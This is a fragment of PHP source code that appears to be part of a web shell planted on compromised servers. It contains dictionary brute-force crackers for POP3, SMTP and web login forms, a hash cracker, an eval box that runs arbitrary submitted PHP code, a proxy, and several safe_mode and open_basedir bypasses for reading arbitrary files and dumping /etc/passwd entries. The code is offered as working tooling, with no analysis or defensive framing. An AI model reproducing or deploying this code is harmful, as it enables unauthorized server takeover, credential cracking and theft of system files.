$pass=substr($combo,strpos($combo,':')+1); }else{ $pass=trim(fgets($dictionary)," \n\r"); } $pop3=pop3logiN($target,$user,$pass); if($pop3==-1){echo "$errorbox Can not connect to server.$et";break;} else{ if ($pop3){echo "U: $user P: $pass ";if(!$type)break;}} flusheR(); } echo " Done"; fclose($dictionary); } else{ echo "$errorbox Can not open dictionary.$et"; } }else echo "${t}POP3 cracker:$crack"; } function smtpcrackeR(){ global $t,$et,$errorbox,$crack; if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ $target=$_REQUEST['target']; $type=$_REQUEST['combo']; $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; $dictionary=fopen($_REQUEST['dictionary'],'r'); if ($dictionary){ echo "Cracking ".htmlspecialchars($target)."... ";flusheR(); while(!feof($dictionary)){ if($type){ $combo=trim(fgets($dictionary)," \n\r"); $user=substr($combo,0,strpos($combo,':')); $pass=substr($combo,strpos($combo,':')+1); }else{ $pass=trim(fgets($dictionary)," \n\r"); } $smtp=smtplogiN($target,$user,$pass,5); if($smtp==-1){echo "$errorbox Can not connect to server.$et";break;} else{ if ($smtp){echo "U: $user P: $pass ";if(!$type)break;}} flusheR(); } echo " Done"; fclose($dictionary); } else{ echo "$errorbox Can not open dictionary.$et"; } }else echo "${t}SMTP cracker:$crack"; } function formcrackeR(){ global $errorbox,$footer,$et,$hcwd; if(!empty($_REQUEST['start'])){ $url=$_REQUEST['target']; $uf=$_REQUEST['userf']; $pf=$_REQUEST['passf']; $sf=$_REQUEST['submitf']; $sv=$_REQUEST['submitv']; $method=$_REQUEST['method']; $fail=$_REQUEST['fail']; $dic=$_REQUEST['dictionary']; $type=$_REQUEST['combo']; $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; if(!file_exists($dic)) die("$errorbox Can not open dictionary.$et$footer"); $dictionary=fopen($dic,'r'); echo "Cracking started... "; while(!feof($dictionary)){ if($type){ $combo=trim(fgets($dictionary)," \n\r"); $user=substr($combo,0,strpos($combo,':')); $pass=substr($combo,strpos($combo,':')+1); }else{ $pass=trim(fgets($dictionary)," \n\r"); } $url.="?$uf=$user&$pf=$pass&$sf=$sv"; $res=check_urL($url,$method,$fail,12); if (!$res){echo "U: $user P: $pass ";flusheR();if(!$type)break;} flusheR(); } fclose($dictionary); echo "Done! "; } else echo " HTTP Form cracker: Dictionary: Dictionary type: Simple (P)Combo (U:P) Username: $hcwd Action Page: Method: POSTGET Username field name: Password field name: Submit name: Submit value: Fail string: "; } function hashcrackeR(){ global $errorbox,$t,$et,$hcwd; if (!empty($_REQUEST['hash']) && !empty($_REQUEST['dictionary']) && !empty($_REQUEST['type'])){ $dictionary=fopen($_REQUEST['dictionary'],'r'); if ($dictionary){ $hash=strtoupper($_REQUEST['hash']); echo "Cracking " . htmlspecialchars($hash)."... ";flusheR(); $type=($_REQUEST['type']=='MD5')?'md5':'sha1'; while(!feof($dictionary)){ $word=trim(fgets($dictionary)," \n\r"); if ($hash==strtoupper(($type($word)))){echo "The answer is $word ";break;} } echo "Done!"; fclose($dictionary); } else{ echo "$errorbox Can not open dictionary.$et"; } } echo "${t}Hash cracker: Dictionary: Hash: Type: MD5SHA1 $hcwd "; } function pr0xy(){ global $errorbox,$et,$footer,$hcwd; echo " Navigator: $hcwd "; if (!empty($_REQUEST['urL'])){ $dir=""; $u=parse_url($_REQUEST['urL']); $host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/'; if(substr_count($file,'/')>1)$dir=substr($file,0,(strpos($file,'/'))); $url=@fsockopen($host, 80, $errno, $errstr, 12); if(!$url)die(" $errorbox Can not connect to host!$et$footer"); fputs($url, "GET /$file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n"); while(!feof($url)){ $con = fgets($url); $con = str_replace("href=mailto","HrEf=mailto",$con); $con = str_replace("HREF=mailto","HrEf=mailto",$con); $con = str_replace("href=\"mailto","HrEf=\"mailto",$con); $con = str_replace("HREF=\"mailto","HrEf=\"mailto",$con); $con = str_replace("href=\'mailto","HrEf=\"mailto",$con); $con = str_replace("HREF=\'mailto","HrEf=\"mailto",$con); $con = str_replace("href=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con); $con = str_replace("HREF=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con); $con = str_replace("href=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con); $con = str_replace("HREF=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con); $con = str_replace("href=http","HrEf=".hlinK("seC=px&urL=http"),$con); $con = str_replace("HREF=http","HrEf=".hlinK("seC=px&urL=http"),$con); $con = str_replace("href=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con); $con = str_replace("HREF=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con); $con = str_replace("href=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con); $con = str_replace("HREF=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con); $con = str_replace("href=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con); $con = str_replace("HREF=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con); echo $con; } fclose($url); } } function mysqlclienT(){ global $t,$errorbox,$et,$hcwd; if (!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && !empty($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){ $server=$_REQUEST['serveR'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY']; if(!empty($_REQUEST['dB']))$db=$_REQUEST['dB']; $link = @mysql_connect($server,$user,$pass); if($link){ if (!empty($db))mysql_select_db($db); $result=mysql_query($query,$link); echo "${t}Query result(s):$et"; echo " "; while($data=mysql_fetch_row($result)){ foreach($data as $v) { echo $v; echo "\t"; } echo "\n"; } echo " "; mysql_close($link); } else{ echo "$errorbox Login failed!$et "; } } echo "${t}MySQL cilent: Server: Username: Password: Database: Query: ";if (!empty($_REQUEST['query'])) echo htmlspecialchars(($_REQUEST['query']));else echo "SHOW DATABASES"; echo " $hcwd "; } function phpevaL(){ global $t,$hcwd; if (!empty($_REQUEST['code'])){ echo ""; $code = str_replace("<?php","",$_REQUEST['code']); $code = str_replace("<?","",$code); $code = str_replace("?>","",$code); htmlspecialchars(eval($code)); echo " "; } echo "${t}Evaler:
Codes:	";if(!empty($_REQUEST['code']))echo htmlspecialchars($_REQUEST['code']);echo "
	$hcwd

";
while(!feof($ser))echo fgets($ser);
echo "

\nMethod $i:(ini_restore)\n";
ini_restore("safe_mode");ini_restore("open_basedir");
$tmp = file_get_contents($_REQUEST['file']);
echo $tmp;
$i++;
echo "\nMethod $i:(copy)\n";
$tmp=tempnam("","cx");
copy("compress.zlib://".$_REQUEST['file'], $tmp);
$fh = fopen($tmp, "r");
$data = fread($fh, filesize($tmp));
fclose($fh);
echo $data;
$i++;
if(function_exists("curl_init")){
echo "\nMethod $i:(curl_init)[A]\n";
$fh = @curl_init("file://".$_REQUEST['file']."");
$tmp = @curl_exec($fh);
echo $tmp;
$i++;
echo "\nMethod $i:(curl_init)[B]\n";
$i++;
if(strstr($_REQUEST['file'],DIRECTORY_SEPARATOR))
$ch =curl_init("file:///".$_REQUEST['file']."\x00/../../../../../../../../../../../../".__FILE__);
else $ch = curl_init("file://".$_REQUEST['file']."\x00".__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
}
if($_REQUEST['file'] == "/etc/passwd"){
echo "\nMethod $i:(posix)\n";
for($uid=0;$uid<99999;$uid++){
$h=posix_getpwuid($uid);
if (!empty($h))foreach($h as $v)echo "$v:";}}
$i++;
echo "

".htmlspecialchars(file_get_contents($name))."